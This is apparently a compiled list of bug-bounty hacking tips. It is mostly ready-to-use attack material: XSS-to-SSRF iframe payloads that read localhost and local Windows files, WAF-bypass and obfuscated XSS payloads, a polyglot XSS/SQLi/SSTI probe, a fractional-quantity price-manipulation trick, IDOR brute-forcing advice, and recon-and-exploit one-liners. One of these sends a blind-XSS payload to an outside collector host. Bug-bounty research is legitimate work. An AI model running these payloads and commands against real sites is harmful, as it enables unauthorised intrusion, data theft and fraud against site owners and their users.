⭐𝐗𝐒𝐒 𝐭𝐨 𝐒𝐒𝐑𝐅 (𝐌𝐞𝐭𝐡𝐨𝐝 𝟐)⭐

* Note this only works if proper sanitization is not performed and the server processes the payload server-side *

Input the following code in the vulnerable field:
<iframe src="http://localhost/some/directory"></iframe>

You can also read local files:
<iframe src="file:///C:/Windows/win.ini" width="500" height="500">

This is especially critical if an application is running on an EC2 instance that does not have IMDSv2 required.

Price Manipulation Method

If the product price parameter cannot be changed, change the quantity of products.

items[1][quantity]=1 --> 234 €
items[1][quantity]=0.1 --> 23.4 €

Hello Hackers,
How are you?

A payload that bypasses Cloudflare WAF

<img/src=x onError="`${x}`;alert(`Hello`);">

You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints

You can then check the status of these endpoints or filter in order to find new vulnerabilities:

Example:

echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints

When hunting for IDORs during a bug bounty program, consider the following tip:

1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.

Example usage:

python3 waymore.py -i sub.target.com -mode U -xcc

2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.

Example command:

cat result.txt | grep "admin"

3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.

Example usage:

ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200

4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.

Example scenario:

Found path: https://sub.taget.com/promo/offer/1234/details

Brute-force the last 3 digits: 1234

By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.

XSS Tip: If alert() is being converted to ALERT() and you can use Like

onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"

Payload for XSS + SQLi + SSTI/CSTI !

'"><noscript/onload=prompt(5);>{{7*7}}

XSS Oneliner

echo "testphp.vulnweb.com" | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

subfinder -d testphp.vulnweb.com -silent | katana -passive -pss waybackarchive,commoncrawl,alienvault | uro | gf xss | Gxss -p XSSRef | dalfox pipe

Blind XSS In X-Forwarded-For Header

subfinder -d http://target.com | gau | bxss -payload '"><noscript src=https://hacker.xss.ht></noscript>' -header "X-Forwarded-For"

🫡Automate Your XSS

#!/bin/bash read TARGET
subfinder -d $TARGET -silent | tee domains.txt cat domains.txt | waybackurls | tee waybackurls.txt
cat waybackurls.txt | dalfox pipe

New XSS Bypass Cloudflare WAF 🧱

Payload : %3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E

New Xss Fly Under Radar Cloudflare Bypass 🧱

Payload :

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>


Credit -Halim